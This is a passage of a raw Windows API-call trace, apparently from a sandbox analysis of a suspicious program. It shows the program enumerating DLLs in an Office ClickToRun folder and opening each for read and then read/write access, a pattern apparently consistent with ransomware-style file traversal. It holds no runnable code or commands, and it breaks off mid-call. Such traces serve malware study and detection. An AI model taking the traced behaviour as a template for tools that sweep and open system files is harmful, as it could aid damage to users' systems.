[0073.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0073.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0073.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0073.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0073.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0073.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0073.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0073.870] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ink", cAlternateFileName="")) returned 1 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0073.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0073.871] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78710 [0074.060] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.061] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0074.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0074.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0074.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0074.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.062] AreFileApisANSI () returned 1 [0074.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 90 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.063] AreFileApisANSI () returned 1 [0074.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x51398 [0074.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0074.063] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.063] GetFileType (hFile=0x42c) returned 0x1 [0074.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0074.063] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.063] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.064] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.064] CloseHandle (hObject=0x42c) returned 1 [0074.064] AreFileApisANSI () returned 1 [0074.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x51398 [0074.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0074.064] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.064] GetFileType (hFile=0x42c) returned 0x1 [0074.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0074.064] CloseHandle (hObject=0x42c) returned 1 [0074.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.066] AreFileApisANSI () returned 1 [0074.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x51398 [0074.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0074.066] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.066] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0074.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0074.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0074.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.068] AreFileApisANSI () returned 1 [0074.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 90 [0074.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0074.069] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.069] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.069] AreFileApisANSI () returned 1 [0074.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x80a30 [0074.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0074.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, 